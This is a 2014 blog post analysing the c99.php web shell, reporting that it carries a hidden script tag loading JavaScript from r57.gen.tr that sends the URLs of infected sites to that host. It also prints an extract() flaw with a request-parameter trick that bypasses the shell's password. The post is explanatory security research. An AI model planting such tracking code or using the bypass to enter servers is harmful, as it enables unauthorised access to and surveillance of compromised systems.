Tuesday, 9 September 2014

Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s)

Free Shells For Everyone C99.php sh3ll - r57.gen.tr Has Backdoor(s). Do you know this sh3ll? If the answer is Yes, you might be infected!

A recent discovery from @Matthew Bryant - Yahoo! Security Team (thehackerblog.com), found that the most used sh3ll for "Hackers" contain several Backdoor(s) which allows the user to bypass his control and gain the access to itself without knowing the password.

He also found how the site r57.gen.tr TRACKS ON the users allowing the admin to steal all the websites where is located the sh3ll.


Let's focusing on the code:


[email protected]:~/Pentest/c99$ grep --color -n "https://" c99.php 
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}

[email protected]:~/Pentest/c99$ grep --color -n "http://" c99.php 11:   http://ccteam.ru/releases/c99shell
13:*  WEB: http://ccteam.ru
79:if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
99:$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
103:$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/"; //Update server
259:if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}
599:# Home page: http://ccteam.ru
855:?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php1706:   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
2912:if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [[email protected] tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\"><img src=\"http://wwp.icq.com/scripts/online.dll?icq=656555&img=5\" border=0 align=absmiddle></a>.</b>";}
2926:<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://r57.gen.tr"><font color="#FF0000">r57 shell</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>

[email protected]:~/Pentest/c99$


But let's see with more attention here:

<SCRIPT SRC=http://www.r57.gen.tr/yazciz/ciz.js></SCRIPT>

And then, let's see where this page goes! (http://www.r57.gen.tr/yazciz/ciz.js)



it's not just a SIMPLE JavaScript Instruction, by using that command, the r57.gen.tr admins will be able to steal the sh3lls

of the other people for report them to the admins and/or taking actions with the Law Enforcement!

Ex. http://www.r57.gen.tr/yaz/yaz.php?a=[OUR URL HERE]


Let's looking into this Code!:

As We see there's an extract command!

With this, the attacker may be able to extracts the values into variables and it means changing how the sh3ll reads the credentials!.

With this, we can see that the variables $login, $md5_pass can be override and so we can bypass them from the sh3ll.

This is the Vulnerable Code:


//Highlight-code colors
$highlight_background = "#c0c0c0";$highlight_bg         = "#FFFFFF";$highlight_comment    = "#6A6A6A";$highlight_default    = "#0000BB";$highlight_html       = "#1300FF";$highlight_keyword    = "#007700";$highlight_string     = "#000000";@$f = $_REQUEST["f"];<strong>@extract($_REQUEST["c99shcook"]);</strong>//END CONFIGURATION// \/ Next code isn't for editing \/$tmp = array();if ($login) {    if (empty($md5_pass)) {        $md5_pass = md5($pass);    }    if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {        if ($login_txt === false) {            $login_txt = "";        } elseif (empty($login_txt)) {            $login_txt = strip_tags(ereg_replace("&amp;nbsp;|&lt;br&gt;", " ", $donated_html));        }        header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt . "\"");        header("HTTP/1.0 401 Unauthorized");        exit($accessdeniedmess);    }}

This line allows you to overwrite any variable using an array:


Which means if we change our URL like below, we can Bypass his restrictions!:[login]=0

Et Voila!, Here is the Result!:

Now, you will know how to bypass the sh3ll restrictions without knowing his Password!


Security Researcher *ORIGINAL* Article(s):

1) http://thehackerblog.com/hacking-script-kiddies-r57-gen-tr-shells-are-backdoored-in-a-way-you-probably-wouldnt-guess/

2) http://thehackerblog.com/every-c99-php-shell-is-backdoored-aka-free-shells/

c99.php sh3ll Dorks:


Vulnerable Sh3ll Code:



About the Author :
Christian Galeone () is a Cyber Security Researcher from Italy, he's currently studying to ITCL Marco Polo ( Upper-Secondary Technical Institute ) attending the IT Programming Class. 
He has been Acknowledged by the TOP 5 Companies including Yahoo!, Microsoft, AT&T, Sony etc.  His future goal is to be a Cyber Security Specialist working for the National Security in his Country.


Post a Comment

Toggle Footer